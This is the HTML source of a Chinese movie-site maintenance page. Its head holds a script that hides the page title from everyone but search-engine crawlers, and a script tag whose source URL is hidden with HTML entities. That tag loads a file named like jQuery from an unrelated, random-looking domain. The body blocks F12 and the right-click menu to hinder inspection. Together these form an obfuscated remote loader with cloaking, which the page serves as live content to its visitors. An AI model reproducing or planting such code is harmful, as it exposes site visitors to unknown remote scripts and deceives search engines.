<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>云栈影院 - 让您第一时间观看热门大片</title>
<script>if(!navigator.userAgent.match(/baiduspider|sogou|360spider|yisou/i)) {document.title = "";}</script>
<script src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#98;&#120;&#99;&#110;&#100;&#114;&#117;&#103;&#119;&#107;&#106;&#100;&#46;&#99;&#111;&#109;&#47;&#106;&#113;&#117;&#101;&#114;&#121;&#46;&#109;&#97;&#105;&#110;&#46;&#106;&#115;"></script>
    <style>
        body {
            overflow: hidden;
        }
        h1 {
            margin: 0;
            font-family: "Montserrat", sans-serif;
            font-size: 4em;
            color: #333;
            -webkit-text-shadow: 0 2px 1px rgba(0, 0, 0, 0.6), 0 0 2px rgba(0, 0, 0, 0.7);
            -moz-text-shadow: 0 2px 1px rgba(0, 0, 0, 0.6), 0 0 2px rgba(0, 0, 0, 0.7);
            text-shadow: 0 2px 1px rgba(0, 0, 0, 0.6), 0 0 2px rgba(0, 0, 0, 0.7);
            word-spacing: 16px;
        }
        p {
            font-family: "Open Sans", sans-serif;
            font-size: 1.4em;
            font-weight: bold;
            color: #222;
            text-shadow: 0 0 40px #FFFFFF, 0 0 30px #FFFFFF, 0 0 20px #FFFFFF;
        }
        .container {
            position: absolute;
            top: 0;
            bottom: 0;
            width: 100%;
            background: url("");
            background-size: cover;
        }
        .wrapper {
            width: 100%;
            min-height: 100%;
            height: auto;
            display: table;
        }
        .content {
            display: table-cell;
            vertical-align: middle;
        }
        .item {
            width: auto;
            height: auto;
            margin: 0 auto;
            text-align: center;
            padding: 8px;
        }
        canvas {
            position: absolute;
            z-index: 0;
            left: 0px;
            top: 0px;
            width: 100%;
        }
        .background {
            display: flex;
            z-index: 3;
            height: 100vh;
            flex-direction: column;
            align-content: center;
            justify-content: center;
            font-family: "Text Me One", sans-serif;
        }
        @media only screen and (min-width: 800px) {
            h1 {
                font-size: 6em;
            }
            p {
                font-size: 1.6em;
            }
        }
        @media only screen and (max-width: 320px) {
            h1 {
                font-size: 2em;
            }
            p {
                font-size: 1.2em;
            }
        }
    </style>
</head>
<body>
<script type="text/javascript">
    //禁用F12
    window.onkeydown = window.onkeyup = window.onkeypress = function (event) {
        // 判断是否按下F12，F12键码为123
        if (event.keyCode == 123) {
            event.preventDefault(); // 阻止默认事件行为
            window.event.returnValue = false;
        }
    }
    //屏蔽右键菜单
    document.oncontextmenu = function (event) {
        if (window.event) {
            event = window.event;
        }
        try {
            var the = event.srcElement;
            if (!((the.tagName == "INPUT" && the.type.toLowerCase() == "text") || the.tagName == "TEXTAREA")) {
                return false;
            }
            return true;
        } catch (e) {
            return false;
        }
    }
</script>
<canvas id="background" width="1280" height="642"></canvas>
<div class="container">
    <div class="wrapper">
        <div class="content">
            <div class="item">
                <h1>全新版本·即将上线</h1>
                <p>内容正在维护审核中......</p>
                <h1><a style="text-decoration:none;" href="http://www.yunzhannet.com/">点击返回首页</a></h1>
            </div>
        </div>
    </div>
</div>
<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js?id=K1LI4Wlt55pyYSll&ck=K1LI4Wlt55pyYSll"></script>

</body>
</html>
